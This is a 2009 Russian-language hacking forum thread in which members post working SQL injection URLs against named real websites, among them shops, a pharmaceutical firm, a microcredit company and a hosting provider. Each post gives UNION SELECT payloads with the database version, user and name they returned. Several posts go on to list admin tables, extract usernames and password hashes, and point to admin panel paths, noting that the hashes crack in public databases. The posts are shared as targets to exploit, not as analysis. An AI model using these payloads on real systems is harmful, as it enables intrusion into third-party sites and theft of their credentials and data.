ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11081  
Старый 01.11.2009, 21:38
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.farmavet.ro/prez_produs.php?id=-76+UNION+SELECT+1,2,3,cast(concat_ws(0x3a,version( ),database(),user(),@@version_compile_os)+as+binar y),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61--

Database Version: 4.1.11-nt
Database name: farmavet
User name: ifarmavet@localhost
Os: win32
 
Ответить с цитированием

  #11082  
Старый 01.11.2009, 23:02
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код:
http://vetka.server.by/?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database())--
4.1.22:vetka@localhost:vetka

Код:
http://www.radiozavod.com/?prod=-16+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--
5.0.81-community:radio_radio@localhost:radio_radio

Код:
http://klinok-blade.ru/rubrikator/index.php?id=999999+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6--
5.0.67-log:u82142@10.10.223.245:u82142

Код:
http://www.kon-tiki.com.ua/index.php?w=country&lang=ru&id=-6+union+select+1,concat_ws(0x3a,version(),user(),database()),3--
5.0.45-log:kontiki@db.skif.com.ua:kontiki

Код:
http://rock.aplus.by/providers/?id=-9+union+select+concat_ws(0x3a,version(),user(),database()),2,3--
5.0.32-
Debian_7etch11:rockaplusby@localhost:rockaplusby

Код:
http://www.almaz-pk.ru/articles?id=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5--
5.0.82-log:almazpk@cub.mplik.ru:almazpk_tmp

Код:
http://www.elitstroymaterials.ru/inside.html?action=news&id=-5+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--
5.0.77:elitstro_elit@localhost:elitstro_elit

Последний раз редактировалось pelligrim; 02.11.2009 в 15:55.. Причина: Bb0y упс, не увидел + еще несколько
 
Ответить с цитированием

  #11083  
Старый 01.11.2009, 23:29
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

2pelligrim, скулю на santafe-club.Ru я выкладывал на прошлой стр
http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7,8+from+information_schema.columns+where+ta ble_name=0x61646d696e75736572
MySQL 5.0.81-community
http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,adminuser,0x3 a,password,0x3a,level),4,5,6,7,8+from+adminuser
админка http://www.solitaire-labs.com/admin
==============================
http://serbianbaseball.org/view_news.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x 3a,pass),3,4+from+admin
MySQL 5.0.81-community
==============================
Забугорный Вэб - Хостинг
www.risingnet.net/news_info.php?id=-4+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables+limit+28,1
MySQL 5.0.45
http://www.risingnet.net/news_info.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x757365725f 6163636f756e74+limit+32,1
интересные таблицы
user_account, user_webinfo
думаю можно убить время и докрутить до логического конца, мне не хватило желания

Последний раз редактировалось Bb0y; 02.11.2009 в 02:42..
 
Ответить с цитированием

  #11084  
Старый 02.11.2009, 06:15
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Магазин «Деревянный Рай»:
Код:
http://www.pskovles.ru/tovar.php?id=-1+union+select+1,2,3/*
Version: 4.1.22-log
Database: konkurent_svoi
User: konkurent_svoi@localhost
 
Ответить с цитированием

  #11085  
Старый 02.11.2009, 15:12
s0l_ir0n
Участник форума
Регистрация: 14.03.2009
Сообщений: 237
Провел на форуме:
813785

Репутация: 314
Отправить сообщение для s0l_ir0n с помощью ICQ
По умолчанию

Микрокредитная организация "Алтын Орда"
Цитата:
http://altynorda.kz/news.php?id=0%20union%20select%201,ConCat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,3,4%2 0--

Последний раз редактировалось jokester; 02.11.2009 в 17:12.. Причина: kpla.kz боян
 
Ответить с цитированием

  #11086  
Старый 02.11.2009, 20:03
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://greenstreetprop.com/view_users.php?id=-4+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x64656661756c745f55 7365724442--
интересные таблици:
default_UserDB::ID:user_name:email_Address:user_pa ssword:isAdmin
default_UserDBElements
default_memberFormElements
default_userFavoriteListings
default_userFormElements
default_userImages
default_userSavedSearches
долбить буду default_UserDB
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,concat_ws(0x3a,user_name,0x3a,use r_password),3+from+default_UserDB--
хэш админа отлично находит на паблик базах
админка: http://greenstreetprop.com/admin

MySQL 5.0.82sp 1
удобно что выводит все строки сразу, не надо играться с лимитами и гроуп конкатом.
слепая
 
Ответить с цитированием

  #11087  
Старый 02.11.2009, 20:25
cupper
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737

Репутация: 180


По умолчанию

Цитата:
http://www.izak.ru/article/index.php?id_article=-286+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14
u15468@10.10.153.207:u15468:5.0.67-log

если и это боян, то объясни мне как ты степень боянности определяешь ?
специально проверил на все ключевые слова в поиске, его нету.
 
Ответить с цитированием

  #11088  
Старый 02.11.2009, 20:48
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Код:
http://www.antonpaleev.ru/show.php?id=52+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
http://www.ppp-pf.ru/show.php?id=154+and+1=0+union+select+1,2,3,4,5,6,7,8--
http://www.egyptt.ru/show.php?id=4+and+1=0+union+select+1,2--
http://www.datatec.ru/show.php?id=271+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.expertitalia.ru/show.php?id=1252182905+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
 
Ответить с цитированием

  #11089  
Старый 02.11.2009, 21:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.pc-coolers.ro/produs.php?id=-103+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21/*



Database Version: 4.1.22-log
Database name: pcc
User name: pcc@localhost
Os: redhat-linux-gnu
 
Ответить с цитированием

  #11090  
Старый 02.11.2009, 23:08
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://job.aviso.ua/news.php?id=-1482+union+select+1,2,version(),4,5,6,7--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ